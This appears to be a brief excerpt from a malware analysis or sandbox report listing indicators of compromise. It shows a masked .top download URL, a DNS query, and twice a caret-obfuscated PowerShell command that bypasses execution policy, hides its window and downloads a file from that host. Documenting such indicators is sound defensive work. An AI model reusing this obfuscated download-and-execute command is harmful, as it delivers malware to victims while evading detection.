Technical Information
- http://www.de###oyedug.top/user.php?f=##### as %appdata%.exe
- DNS ASK de###oyedug.top
- '<SYSTEM32>\cmd.exe' /c P^o^wershe^LL.e^Xe^ -^ex^ec^U^t^i^ONPOlIcY^ bYPass^ -^n^o^P^rofIl^e^ ^-wI^nd^ow^stYLe hI^d^d^eN ^(New-OBj^ect ^s^Yst^em.net.weBcl^I^e^N^t).do^w^nLo^ad^f^ILe(^'http://www.de###oyedug....' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c P^o^wershe^LL.e^Xe^ -^ex^ec^U^t^i^ONPOlIcY^ bYPass^ -^n^o^P^rofIl^e^ ^-wI^nd^ow^stYLe hI^d^d^eN ^(New-OBj^ect ^s^Yst^em.net.weBcl^I^e^N^t).do^w^nLo^ad^f^ILe(^'http://www.de###oyedug....